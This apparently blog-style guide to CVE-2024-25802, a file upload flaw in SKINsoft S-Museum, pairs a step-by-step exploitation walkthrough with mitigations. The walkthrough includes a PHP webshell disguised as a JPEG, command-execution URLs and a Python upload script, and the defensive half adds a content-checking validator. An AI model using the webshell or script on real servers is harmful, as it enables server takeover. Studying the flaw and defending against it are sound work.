Published: June 2024
Author: [YourName]

Introduction

CVE-2024-25802 is a critical file upload vulnerability found in SKINsoft S-Museum 7.02.3 — a museum collection management system used worldwide. It allows attackers to upload malicious files through the Add Media feature. Unlike its close cousin, CVE-2024-25801, where the filename triggers the problem, CVE-2024-25802 is all about what's *inside the file* — the server barely checks file types or content, letting everything slide through.

If exploited, this bug lets anyone with access to the Add Media page execute arbitrary code, compromise the server, or plant backdoors for future access. This guide explains how the flaw works, walks through exploitation step by step, and shows how to defend affected systems.

Vulnerability type: Unrestricted File Upload (based on file *content*)

- CVE: CVE-2024-25802

Technical Background

In S-Museum 7.02.3, staff, contributors, or researchers commonly add new images, videos, and media files via a friendly ‘Add Media’ page at URLs like /s-museum/media/add. Unfortunately, the backend PHP code only lightly checks extensions or MIME types, and never scans the actual file bytes for dangerous content.

For example, a .php file, or a legitimate-looking .jpg file with embedded PHP, is accepted and placed on the server right inside the public /upload/ path. There is no verification that uploaded files are safe for public access.

This means attackers can craft files that execute code once accessed — even if they look harmless.

Exploiting CVE-2024-25802: Step-by-Step

Let’s demonstrate how an attacker could abuse this.

1. Prepare a Malicious File

Create a PHP webshell (or any dangerous file content). It can even have a .jpg name to look harmless.

Example: evil.jpg

<?php system($_GET['cmd']); ?>

2. Log in to S-Museum (or Use a Non-Privileged Account)

If registration is open or you have any valid role — proceed.
Go to the Media Library: /s-museum/media/add

3. Upload Your ‘Image’

Click ‘Add Media’, select evil.jpg (containing real PHP code), fill in the form, and upload.

The system saves it to a web-accessible folder, e.g.

https://museum.example.com/uploads/media/evil.jpg

But the real content is executable code.

Now open the webshell in a browser, passing a command:

https://museum.example.com/uploads/media/evil.jpg?cmd=id

The server executes id and returns the output. You now own the server!

Proof-of-Concept Exploit Code

Here’s a simple exploit script in Python using requests to automate the process (assuming you already have a login cookie or a valid session):

import requests

URL = "https://museum.example.com/s-museum/media/add"
UPLOAD_PATH = "/uploads/media/evil.jpg"

# PHP webshell payload
payload = "<?php system($_GET['cmd']); ?>"

# Save webshell to file
with open("evil.jpg", "w") as f:
    f.write(payload)

# You may need authentication cookies/headers
headers = {
    # e.g. 'Cookie': 'PHPSESSID=xxxx'
}

# Prepare file upload: declared MIME type is image/jpeg, but the content is PHP
with open("evil.jpg", "rb") as fh:
    files = {
        'media_file': ('evil.jpg', fh, 'image/jpeg')
    }
    response = requests.post(URL, files=files, headers=headers)

if response.ok:
    print("Upload succeeded! Try executing:")
    print(f"https://museum.example.com{UPLOAD_PATH}?cmd=whoami")
else:
    print("Upload failed:", response.status_code)

Note: Adapt the upload form field names as appropriate. Also, use legally!

Mitigation

- Restrict media upload access to trusted (admin) roles only.
- Block execution of uploaded files by configuring the webserver (e.g., disallow .php, .exe, etc. in /uploads/).
- Check file types by parsing actual file content.
- For images, require valid JPEG/PNG binary signatures (headers).
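As an added example (not code from the original post or from SKINsoft), here is a Python upload validator implementing the content checks above: it compares the real JPEG/PNG signature bytes against the declared extension, rejects data carrying PHP or script tags, and stores the file under a server-chosen name. The function name, field handling and sample bytes are constructed for illustration.

```python
import re
import secrets
from pathlib import PurePosixPath

# Leading bytes (magic numbers) of the image formats the Add Media page should accept.
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
}
# Map accepted extensions to the canonical type used for the signature check.
ALLOWED_EXT = {"jpg": "jpg", "jpeg": "jpg", "png": "png"}
# Script tags that must never appear inside an "image" served from /uploads/.
SCRIPT_MARKERS = re.compile(rb"<\?php|<\?=|<script|<%", re.IGNORECASE)


def validate_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (ok, detail): on success detail is a server-chosen storage
    name, on failure it is the rejection reason."""
    # Keep only the base name so '../' or absolute paths cannot escape the upload dir.
    name = PurePosixPath(filename.replace("\\", "/")).name
    parts = name.lower().rsplit(".", 1)
    if len(parts) != 2 or parts[1] not in ALLOWED_EXT:
        return False, "extension not allowed"
    ext = ALLOWED_EXT[parts[1]]
    # The declared extension must agree with the real file signature.
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match declared image type"
    # A real image header followed by PHP tags is the polyglot case: reject it outright.
    if SCRIPT_MARKERS.search(data):
        return False, "embedded script markers in image data"
    # Never reuse the client's name; store under a random name with the verified extension.
    return True, f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed samples: the webshell under a .jpg name, a JPEG/PHP polyglot,
    # and a minimal JPEG header.
    samples = {
        "evil.jpg": b"<?php system($_GET['cmd']); ?>",
        "poly.jpg": b"\xff\xd8\xff\xe0" + b"<?php system($_GET['cmd']); ?>",
        "photo.jpeg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00",
    }
    for fname, blob in samples.items():
        print(fname, validate_upload(fname, blob))
```

The tag scan is a heuristic; blocking script execution in /uploads/ at the webserver remains the primary control, and re-encoding accepted images with an image library strips embedded payloads more reliably.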


Conclusion

CVE-2024-25802 demonstrates how a single unchecked media upload path can lead to full server compromise. Checking only filenames or extensions is never enough. Always scan file content, limit upload privileges, and patch fast.

Stay safe, and patch your S-Museum!


Timeline

Published on: 02/22/2024 18:15:48 UTC
Last modified on: 10/30/2024 14:35:08 UTC